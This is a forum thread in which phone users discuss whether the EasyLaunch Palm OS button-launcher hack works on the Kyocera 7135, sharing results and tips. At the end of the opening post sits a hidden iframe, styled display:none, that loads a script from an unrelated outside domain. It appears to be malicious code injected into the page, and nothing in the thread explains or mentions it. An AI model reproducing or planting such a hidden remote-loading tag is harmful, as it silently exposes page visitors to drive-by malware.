+ Reply to Thread

Does this palm OS hack work

I have a Samsung I300 and really like it, but would love to upgrade to the Kyo. I do have one must have app though and it is the EasyLaunch hack. It basically allows you to program your keys to launch any app you want and you can put up to three "apps" on any button, one for a quick press, one for holding it down for a short period of time, and one for holding it down longer. For instance, I have one of my buttons programmed to bring up my speed dial list if I hold it down.

I was hoping someone with the new 7135 could check this out for me. Here is a link to the hack http://www.palmgear.com/software/sho...16&prodID=8774

And you need hack master to set it up.

This app makes my phoe SOOO much more useful that if it doesn't work on the 7135, I won't buy it.

If anyone has tried this or wants to try, please pot your results here.

Just note, I am not responsible if you get addicted to this app the way I have. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Just installed it - so far so good.

Cool App.

Is this working with the other 7135 keys as well? Like if you hold 0-9 or * ?

It sounds very cool.
    iPhone therefore iAm.

No numeric keys can be set (that I see) - Just the main keys and special strokes

Bummer, thanks for checking that out.
    iPhone therefore iAm.

Cautionary note: On my 7135 I'm having no luck with the press and hold options, or the 'press with' option. I turned on the 'click on long press' option and I hear the click, but it never launches the app.

Originally posted by LongTimeLurker
    Cautionary note: On my 7135 I'm having no luck with the press and hold options, or the 'press with' option. I turned on the 'click on long press' option and I hear the click, but it never launches the app.
    You have to release the button when you hear the click - then the app launches

Thanks for the replies.

vansman,

All the features are working for you? I use the press and hold option for just about every button.

For instance, on the memo button, normal press opens the memo pad, medium press opens my Word document reader, and the longest opens my ebook reader.

Similarly, my address button is setup to open TakePhone for quick press, address book for the medium and call log for the long one.

As far as I am concerned, this is an awesome feature. No more fumpling trying to get to the home screen and launch the apps from there. Just about everything I need on a day to day basis is a single button press away. I'm not sure why Palm hasn't included it in their OS.

I can't say all the features are working, as I have not played with the program that much, and am sure I have missed some things.

What I do have working is My address and schedule buttons launching additional Apps by holding them down a little longer. I have not played with the key combos nor special strokes yet..

I have not tried to assign anything to the mail or web buttons on the phone yet, I do not know if they will work since they replace the standard Palm buttons.

Will play some more this weekend.

It also will not work with any apps that are stored on the SD card.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I am loving this application. I had not planned on adding any Hacks at least for a while, but this one sounded good enough to change my mind, and I am glad I did. Very cool.

Alan

Then you guys might also like this...

Hard Button Extender (HBX) 1.2
    ~'kito
    pdaPhoneHome Moderator

I really like McPhling's app launching capability on my 6035. Has anyone tried this on the 7135 to see if it works?